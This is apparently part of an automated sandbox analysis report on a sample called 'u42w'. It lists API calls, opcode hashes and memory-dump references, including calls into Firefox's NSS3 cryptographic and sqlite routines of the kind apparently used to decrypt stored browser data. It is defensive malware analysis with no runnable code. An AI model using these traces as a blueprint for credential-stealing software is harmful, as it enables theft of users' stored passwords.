                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeStringmallocmemcpymemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2844179199-3916222277
                                                                                                                                                                                                                              • Opcode ID: c251b2e1c2777a2feb96866a849bf03b0c8983f674b3dde2610894d3139916f7
                                                                                                                                                                                                                              • Instruction ID: 16cc530deb27457f536659a64f134916331f5af867ee6c6bf2a367595298ef92
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c251b2e1c2777a2feb96866a849bf03b0c8983f674b3dde2610894d3139916f7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66E11075910208ABCB14EBA1DC91FEEBB79BF54304F41415EF10667191DF38AA86CFA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C984CF3
                                                                                                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C984D28
                                                                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C984D37
                                                                                                                                                                                                                                • Part of subcall function 6CA6D930: PL_strncpyz.NSS3(?,?,?), ref: 6CA6D963
                                                                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C984D4D
                                                                                                                                                                                                                              • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C984D7B
                                                                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C984D8A
                                                                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C984DA0
                                                                                                                                                                                                                              • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C984DBC
                                                                                                                                                                                                                              • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C984E20
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                              • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
                                                                                                                                                                                                                              • API String ID: 1003633598-3553622718
                                                                                                                                                                                                                              • Opcode ID: e9f65bc760e662a6d27b16f9266d5e2ccb20c69db11f24f28aa7f7c1ae4f68f8
                                                                                                                                                                                                                              • Instruction ID: be9ca0204aba02517de504f42923589879dab2f2f8294750dcf5275051c1fa1d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9f65bc760e662a6d27b16f9266d5e2ccb20c69db11f24f28aa7f7c1ae4f68f8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D411671602205AFD704CF50ED98F9A7BBDBF5230DF048925E5096BA22DB30D889CFA5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SEC_ASN1DecodeItem_Util.NSS3(?,?,6CA81DE0,?), ref: 6C9B6CFE
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C9B6D26
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C9B6D70
                                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000480), ref: 6C9B6D82
                                                                                                                                                                                                                              • DER_GetInteger_Util.NSS3(?), ref: 6C9B6DA2
                                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C9B6DD8
                                                                                                                                                                                                                              • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C9B6E60
                                                                                                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C9B6F19
                                                                                                                                                                                                                              • PK11_DigestBegin.NSS3(00000000), ref: 6C9B6F2D
                                                                                                                                                                                                                              • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C9B6F7B
                                                                                                                                                                                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C9B7011
                                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(00000000), ref: 6C9B7033
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C9B703F
                                                                                                                                                                                                                              • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C9B7060
                                                                                                                                                                                                                              • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C9B7087
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C9B70AF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2108637330-0
                                                                                                                                                                                                                              • Opcode ID: 9255c27bad90275707646bf49d01b9cdbf70c19bdff7e949494bc9f60fb46865
                                                                                                                                                                                                                              • Instruction ID: d6e1631bc6a14d8911c6df1e620475a8ebfaa0e1c7266c81f2571cde57f89323
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9255c27bad90275707646bf49d01b9cdbf70c19bdff7e949494bc9f60fb46865
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1BA1E771904201BBEB088F24DC45B6B32A8DB9130CF248939F919EBB91E775F865C793
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,?,-00000001,?,?,?,6C96662E,?,?), ref: 6C99264E
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C96662E,?,?), ref: 6C992670
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C96662E,?), ref: 6C992684
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C9926C2
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6C9926E0
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C9926F4
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C99274D
                                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C9928A9
                                                                                                                                                                                                                                • Part of subcall function 6C9A3440: PK11_GetAllTokens.NSS3 ref: 6C9A3481
                                                                                                                                                                                                                                • Part of subcall function 6C9A3440: PR_SetError.NSS3(00000000,00000000), ref: 6C9A34A3
                                                                                                                                                                                                                                • Part of subcall function 6C9A3440: TlsGetValue.KERNEL32 ref: 6C9A352E
                                                                                                                                                                                                                                • Part of subcall function 6C9A3440: EnterCriticalSection.KERNEL32(?), ref: 6C9A3542
                                                                                                                                                                                                                                • Part of subcall function 6C9A3440: PR_Unlock.NSS3(?), ref: 6C9A355B
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C9927A1
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,?,-00000001,?,?,?,6C96662E,?,?,?), ref: 6C9927B5
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C9927CE
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C9927E8
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C), ref: 6C992800
                                                                                                                                                                                                                                • Part of subcall function 6C99F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C99F854
                                                                                                                                                                                                                                • Part of subcall function 6C99F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C99F868
                                                                                                                                                                                                                                • Part of subcall function 6C99F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C99F882
                                                                                                                                                                                                                                • Part of subcall function 6C99F820: free.MOZGLUE(04C483FF,?,?), ref: 6C99F889
                                                                                                                                                                                                                                • Part of subcall function 6C99F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C99F8A4
                                                                                                                                                                                                                                • Part of subcall function 6C99F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C99F8AB
                                                                                                                                                                                                                                • Part of subcall function 6C99F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C99F8C9
                                                                                                                                                                                                                                • Part of subcall function 6C99F820: free.MOZGLUE(280F10EC,?,?), ref: 6C99F8D0
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C992834
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C99284E
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C), ref: 6C992866
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407AD
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407CD
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407D6
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C8D204A), ref: 6C9407E4
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,6C8D204A), ref: 6C940864
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C940880
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,6C8D204A), ref: 6C9408CB
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(?,?,6C8D204A), ref: 6C9408D7
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(?,?,6C8D204A), ref: 6C9408FB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$CriticalSection$Unlock$Enterfree$DeleteError$K11_calloc$ImportPublicTokens
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 544520609-0
                                                                                                                                                                                                                              • Opcode ID: adca67271d13a5b72883917e16e1111bd33bfbeddd1f28a892c2a790d248bb4f
                                                                                                                                                                                                                              • Instruction ID: ec5db103146cf4222a1dffa13a0cbfe32716006cd7f02f7304c752f5503bf79a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: adca67271d13a5b72883917e16e1111bd33bfbeddd1f28a892c2a790d248bb4f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4CB1E574D00706DFEB00DF69D888BAAB7B8FF19308F188529D915A7B11E731E945CBA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                                              • String ID: block
                                                                                                                                                                                                                              • API String ID: 3407564107-2199623458
                                                                                                                                                                                                                              • Opcode ID: 5aaf34a2caa88f06c2b9c4fcf3d4ffa84596d47c58685c8ea530080989fa9c66
                                                                                                                                                                                                                              • Instruction ID: 7825bcbe27da9618b603611e1cfecd621835b499ad6dca7fa43ef563d7fd58f0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5aaf34a2caa88f06c2b9c4fcf3d4ffa84596d47c58685c8ea530080989fa9c66
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F514074A08209EFDB20DFA1D955BAE77B5BF44305F10807AE802B76C0D778E985CB59
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6CA2A4E6
                                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6CA2A4F9
                                                                                                                                                                                                                              • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA2A553
                                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6CA2A5AC
                                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA2A5F7
                                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA2A60C
                                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000110E1,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA2A633
                                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA2A671
                                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6CA2A69A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _byteswap_ulong$_byteswap_ushortsqlite3_log
                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                              • API String ID: 2358773949-598938438
                                                                                                                                                                                                                              • Opcode ID: 5b699a0b782f72f7d0a440467ad75e499d86d4f0364d99e6c62d69d20695e6e0
                                                                                                                                                                                                                              • Instruction ID: 21d77432383c08cb6554189a3dac090ebcb81136516c505556ff9f2aa8aac06d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b699a0b782f72f7d0a440467ad75e499d86d4f0364d99e6c62d69d20695e6e0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D05193B1908311AFDB019F25D980A9B7BE2AF44718F0C886DF84987A51F735DDD8CB92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,6C951984,?), ref: 6C9545F2
                                                                                                                                                                                                                              • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C9545FB
                                                                                                                                                                                                                                • Part of subcall function 6C9B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C9B08B4
                                                                                                                                                                                                                              • SECITEM_CompareItem_Util.NSS3(00000000,-00000001), ref: 6C95461E
                                                                                                                                                                                                                                • Part of subcall function 6C9AFCB0: memcmp.VCRUNTIME140(?,8B0B74C0,04C6831E,?,00000000,?,6C954101,00000000,?,?,?,6C951666,?,?), ref: 6C9AFCF2
                                                                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(00000000,?,-00000019), ref: 6C954646
                                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C954662
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE023,00000000), ref: 6C95467A
                                                                                                                                                                                                                              • PR_CallOnce.NSS3(6CAB2AA4,6C9B12D0), ref: 6C954691
                                                                                                                                                                                                                              • PL_FreeArenaPool.NSS3 ref: 6C9546A3
                                                                                                                                                                                                                              • PL_FinishArenaPool.NSS3 ref: 6C9546AB
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C9546BC
                                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(?), ref: 6C9546E5
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C954717
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Util$ArenaItem_Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_freememcmpmemcpy
                                                                                                                                                                                                                              • String ID: security
                                                                                                                                                                                                                              • API String ID: 3482804875-3315324353
                                                                                                                                                                                                                              • Opcode ID: 4294d4323d484cf04a7bdf3178f3397db0345f86548169474cbfe8bfd3d7e20e
                                                                                                                                                                                                                              • Instruction ID: 7424c6786ba66bb3e8d13ce17f208ca0bc52de817db620fd53835585c4d90232
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4294d4323d484cf04a7bdf3178f3397db0345f86548169474cbfe8bfd3d7e20e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B44104B29063106BE740CB659C44B5B77ECAF9825CF450A29EC19A3B81E731E534CBE6
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9CADB1
                                                                                                                                                                                                                                • Part of subcall function 6C9ABE30: SECOID_FindOID_Util.NSS3(6C96311B,00000000,?,6C96311B,?), ref: 6C9ABE44
                                                                                                                                                                                                                              • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C9CADF4
                                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C9CAE08
                                                                                                                                                                                                                                • Part of subcall function 6C9AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA818D0,?), ref: 6C9AB095
                                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C9CAE25
                                                                                                                                                                                                                              • PL_FreeArenaPool.NSS3 ref: 6C9CAE63
                                                                                                                                                                                                                              • PR_CallOnce.NSS3(6CAB2AA4,6C9B12D0), ref: 6C9CAE4D
                                                                                                                                                                                                                                • Part of subcall function 6C8D4C70: TlsGetValue.KERNEL32(?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4C97
                                                                                                                                                                                                                                • Part of subcall function 6C8D4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4CB0
                                                                                                                                                                                                                                • Part of subcall function 6C8D4C70: PR_Unlock.NSS3(?,?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4CC9
                                                                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9CAE93
                                                                                                                                                                                                                              • PR_CallOnce.NSS3(6CAB2AA4,6C9B12D0), ref: 6C9CAECC
                                                                                                                                                                                                                              • PL_FreeArenaPool.NSS3 ref: 6C9CAEDE
                                                                                                                                                                                                                              • PL_FinishArenaPool.NSS3 ref: 6C9CAEE6
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9CAEF5
                                                                                                                                                                                                                              • PL_FinishArenaPool.NSS3 ref: 6C9CAF16
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                                                                                                                              • String ID: security
                                                                                                                                                                                                                              • API String ID: 3441714441-3315324353
                                                                                                                                                                                                                              • Opcode ID: 7d11d7468e030135801be352ffd66f595c4ff2576f9e6c2e9881b82e841e7b4f
                                                                                                                                                                                                                              • Instruction ID: 1e7f1ebb469bc3d4f495db4ae0099a44ff26f6ec9ecbb9fcda9774b98926a25c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d11d7468e030135801be352ffd66f595c4ff2576f9e6c2e9881b82e841e7b4f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31412AB1A0420467E7215B28EC49BAB32BCAFA231CF540525E814A7F81FF35E558C7E7
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?), ref: 6C99EE0B
                                                                                                                                                                                                                                • Part of subcall function 6C9B0BE0: malloc.MOZGLUE(6C9A8D2D,?,00000000,?), ref: 6C9B0BF8
                                                                                                                                                                                                                                • Part of subcall function 6C9B0BE0: TlsGetValue.KERNEL32(6C9A8D2D,?,00000000,?), ref: 6C9B0C15
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C99EEE1
